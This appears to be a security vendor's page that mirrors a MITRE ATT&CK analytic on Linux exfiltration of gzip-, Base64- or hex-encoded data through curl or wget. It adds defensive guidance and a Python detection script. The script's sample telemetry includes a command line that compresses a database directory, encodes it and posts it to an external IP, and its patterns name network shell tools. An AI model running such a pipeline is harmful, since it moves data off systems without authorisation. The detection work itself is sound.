MITRE ATT&CK® Analytic

AN0303: Analytic 0303

Custom scripts or processes encode outbound traffic using gzip, Base64, or hex prior to exfiltration via curl, wget, or custom sockets. Encoding typically occurs before or during outbound connections from non-network daemons.

Enterprise · AN0303 · Analytic · Object v1.0 · Modified
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

This analytic describes a Linux exfiltration pattern where a script or process encodes outbound data with gzip, Base64, or hex before sending it out through tools such as curl, wget, or custom sockets. The business significance is that encoding can make data movement look less obvious than plain-text transfer, especially when it comes from processes that are not normally expected to make network connections. For leaders, this is a reminder to validate whether Linux server telemetry can connect process behavior, command-line activity, and outbound network activity during investigations.

Executive priority

Prioritize this as a visibility and response-readiness question for Linux environments that hold sensitive data or support critical operations. Security leaders should ask whether SOC and IR teams can prove what process initiated an outbound connection, whether data was transformed before transfer, and whether outbound traffic from unusual Linux processes is monitored. Because MITRE provides no detection logic for this analytic, organizations should treat it as a control-validation opportunity rather than an out-of-the-box detection guarantee.

Technical view

For SOC and detection teams, the useful validation point is correlation: encoded or compressed data handling by a Linux process followed by outbound transfer through curl, wget, or custom socket activity, especially from non-network daemons. Since no ATT&CK detection text or relationships are supplied, detection engineering should focus on local baselining of expected Linux process-to-network behavior, command-line visibility where available, and alert tuning around unusual outbound connections from processes that do not normally communicate externally.

Likely telemetry

  • Linux process creation and command-line telemetry
  • Parent-child process relationships
  • Outbound network connection metadata from Linux hosts
  • Use of curl, wget, or similar outbound transfer utilities
  • Evidence of gzip, Base64, or hex encoding activity in scripts or process arguments where collected

Detection direction

  • Validate that Linux telemetry can associate outbound connections with the originating process and user context.
  • Baseline expected use of curl, wget, compression, and encoding utilities to reduce false positives from legitimate administration or automation.
  • Prioritize investigation of outbound network activity from processes or daemons that are not normally network-facing.
  • Tune detections carefully because gzip, Base64, hex encoding, curl, and wget can all be legitimate in Linux operations.
  • Because MITRE provides no official detection logic for this analytic, test candidate detections against local Linux workloads before relying on them operationally.
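As an added example (not code from MITRE or Glexia) that ties the Technical view and the Detection direction together: the script below correlates constructed Linux process and network telemetry, flags a command line that both encodes and transfers data when its process tree then connects outbound within a short window, baselines an allowed internal destination, and raises severity when the parent is a daemon that is not expected to use the network. The field names, the non-network daemon list and the allowed destination are assumptions to be replaced with local baselines.

```python
import re
from datetime import datetime, timedelta
# Constructed sample telemetry; field names are assumed, not a vendor schema.
PROCS = [
    {"ts": "2026-01-10T03:00:01", "pid": 1000, "ppid": 900, "pcomm": "crond", "user": "root",
     "cmdline": "sh -c tar cz /srv/db | base64 | curl -s --data-binary @- https://198.51.100.7/u"},
    {"ts": "2026-01-10T03:00:01", "pid": 1003, "ppid": 1000, "pcomm": "sh", "user": "root",
     "cmdline": "curl -s --data-binary @- https://198.51.100.7/u"},
    {"ts": "2026-01-10T04:00:05", "pid": 2001, "ppid": 2000, "pcomm": "sshd", "user": "admin",
     "cmdline": "bash -c gzip -c app.log | curl -T - http://10.0.5.20/logs/"},
]
NET = [
    {"ts": "2026-01-10T03:00:02", "pid": 1003, "dst": "198.51.100.7", "dport": 443},
    {"ts": "2026-01-10T04:00:06", "pid": 2001, "dst": "10.0.5.20", "dport": 80},
]
ENCODER = re.compile(r"\b(gzip|base64|xxd|tar\s+-?\S*z)\b")  # compress/encode in args
TRANSFER = re.compile(r"\b(curl|wget|nc|ncat|socat)\b")       # outbound transfer tools
NON_NETWORK_DAEMONS = {"crond", "cron", "atd", "logrotate"}   # assumed local baseline
ALLOWED_DESTS = {"10.0.5.20"}                                 # assumed internal log host

def descendants(pid, procs):
    """Return the pids of every process spawned (transitively) under pid."""
    out, stack = set(), [pid]
    while stack:
        parent = stack.pop()
        for p in procs.values():
            if p["ppid"] == parent and p["pid"] not in out:
                out.add(p["pid"])
                stack.append(p["pid"])
    return out

def find_encoded_exfil(process_events, network_events, window=timedelta(seconds=120)):
    """Flag encode+transfer command lines whose process tree then connects outbound."""
    procs = {e["pid"]: e for e in process_events}
    alerts = []
    for p in process_events:
        if not (ENCODER.search(p["cmdline"]) and TRANSFER.search(p["cmdline"])):
            continue
        tree = {p["pid"]} | descendants(p["pid"], procs)
        start = datetime.fromisoformat(p["ts"])
        for n in network_events:
            when = datetime.fromisoformat(n["ts"])
            inside = n["pid"] in tree and start <= when <= start + window
            if not inside or n["dst"] in ALLOWED_DESTS:  # baselined destinations dropped
                continue
            alerts.append({"pid": p["pid"], "user": p["user"], "parent": p["pcomm"],
                           "dst": n["dst"], "cmdline": p["cmdline"],
                           "severity": "high" if p["pcomm"] in NON_NETWORK_DAEMONS else "medium"})
    return alerts
```

The admin's gzip-to-internal-log-host pipeline is dropped by the destination baseline, while the cron-spawned shell that compresses, Base64-encodes and posts to an external address is returned as a high-severity alert.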

Mitigation priorities

  • Restrict and monitor outbound network access from Linux systems based on business need.
  • Harden service accounts and daemon execution contexts so unexpected scripting and outbound communication are easier to identify and contain.
  • Ensure logging or endpoint telemetry captures process, command-line, and network linkage on Linux hosts that handle sensitive data.
  • Review legitimate automation that uses curl, wget, compression, or encoding so defenders can distinguish expected activity from suspicious behavior.
  • Include this pattern in incident response playbooks for suspected data exfiltration from Linux systems.

Analyst notes and limits

The object is a detection analytic for Linux only. It describes encoded outbound traffic prior to exfiltration using common utilities or custom sockets, with emphasis on activity from non-network daemons. No ATT&CK tactics, relationships, aliases, or official detection procedure were supplied, so the take focuses on defensive validation rather than specific rule logic.

This summary is limited to the supplied STIX fields and external reference. There is no provided detection pseudocode, no linked technique relationship, no threat actor or campaign context, and no evidence of active exploitation. Local asset criticality, normal Linux administration patterns, and available telemetry determine practical priority and detection feasibility.

Official MITRE ATT&CK definition

Analytic 0303

Custom scripts or processes encode outbound traffic using gzip, Base64, or hex prior to exfiltration via curl, wget, or custom sockets. Encoding typically occurs before or during outbound connections from non-network daemons.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources — Updates.

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: 6ef33787e7ab65bf...

Imported snapshots across ATT&CK releases (1):

Release | Bundle imported | Object version | Modified | Status | Raw hash
19.1 | | 1.0 | | Current bundle | 6ef33787e7ab…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. mitre-attack AN0303 (source URL)

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.